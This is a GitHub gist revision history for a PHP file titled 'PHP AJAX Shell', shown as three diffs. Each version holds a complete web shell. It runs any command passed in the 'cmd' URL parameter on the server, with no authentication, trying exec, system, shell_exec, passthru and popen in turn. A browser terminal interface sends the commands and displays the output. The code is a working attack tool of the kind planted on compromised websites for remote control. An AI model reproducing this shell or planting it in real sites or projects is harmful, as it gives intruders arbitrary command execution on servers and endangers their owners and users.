Last active
July 22, 2020 08:20
-
-
Save lav45/1966d2ba3c73548b0ee1 to your computer and use it in GitHub Desktop.
Revisions
-
lav45 revised this gist
Mar 28, 2015 . 1 changed file with 20 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -3,7 +3,26 @@ ini_set('max_execution_time', 0); if (!empty($_GET['cmd'])) { $in = $_GET['cmd']; $out = ""; if (function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (is_resource($f = @popen($in,"r"))) { while(!@feof($f)) $out .= fread($f,1024); pclose($f); } exit($out); } ?> <html> -
Mar 28, 2015 . 1 changed file with 3 additions and 28 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,33 +1,9 @@ <?php ini_set('max_input_time', 0); ini_set('max_execution_time', 0); if (!empty($_GET['cmd'])) { exit(`{$_GET['cmd']}`); } ?> <html> @@ -80,11 +56,10 @@ function doReq(_1){ if(!HR){ return false; } HR.onreadystatechange=function(){ if(HR.readyState == 4 && HR.status == 200){ pR(HR.responseText); } }; HR.open("GET",_1,true); HR.send(null); -
Sep 23, 2014 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
Sep 23, 2014 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,135 @@ <?php ob_implicit_flush(true); ini_set('display_errors', 1); ini_set('max_input_time', 0); ini_set('max_execution_time', 0); error_reporting(E_ALL & ~E_NOTICE); header('Content-Type:text/html; charset=utf-8'); if (!empty($_GET['cmd'])) { $in = $_GET['cmd']; $out = ""; if (function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (is_resource($f = @popen($in,"r"))) { while(!@feof($f)) $out .= fread($f,1024); pclose($f); } exit($out); } ?> <html> <head> <title>PHP AJAX Shell</title> <meta http-equiv="Content-Type" content="text/html; charset=charset=utf-8" /> <style> body { font-family: courier; margin: 0; overflow: hidden; } div { color: #3F0; background: #000; overflow: auto; padding:5px; height: 100%; } input { color: #FFF; background: #333; width: 100%; padding: 3px; margin: 0; } table { height: 100%; width: 100%; } td { padding: 0; margin: 0; } </style> </head> <body> <form onsubmit="return false"> <table> <tr><td><div id="outt">:~> </div></td></tr> <tr><td style="height: 1px;"><input onkeyup="keyE(event)" type="text" /></td></tr> </table> </form> </body> <script type="text/javascript" language="javascript"> var CommHis = new Array(); var HisP, el; el = document.getElementsByTagName('input')[0]; el.focus(); function doReq(_1){ var HR = false; if(window.XMLHttpRequest){ HR = new XMLHttpRequest(); if(HR.overrideMimeType){ HR.overrideMimeType("text/xml"); } }else{ if(window.ActiveXObject){ try{ HR = new ActiveXObject("Msxml2.XMLHTTP"); }catch(e){ try{ HR = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){} } } } if(!HR){ return false; } HR.onreadystatechange=function(){ if(HR.readyState == 4){ if(HR.status == 200){ pR(HR.responseText); } }}; HR.open("GET",_1,true); HR.send(null); } function pR(rS){ var _6 = document.getElementById("outt"); var _7 = rS.split("\n"); var _8 = el.value; _6.appendChild(document.createTextNode(_8)); _6.appendChild(document.createElement("br")); for(var _9 in _7){ var _a=document.createElement("pre"); _a.style.display = "inline"; line = document.createTextNode(_7[_9]); _a.appendChild(line); _6.appendChild(_a); _6.appendChild(document.createElement("br")); } _6.appendChild(document.createTextNode(":~> ")); _6.scrollTop=_6.scrollHeight; el.value = ""; } function keyE(_event){ switch(_event.keyCode){ case 13: var _c = el.value; if(_c){ CommHis[CommHis.length] = _c; HisP = CommHis.length; doReq(document.location.href + "?cmd=" + escape(_c)); } break; case 38: if(HisP > 0){ HisP--; el.value = CommHis[HisP]; }break; case 40: if(HisP < CommHis.length-1){ HisP++; el.value = CommHis[HisP]; } break; }} </script> </html>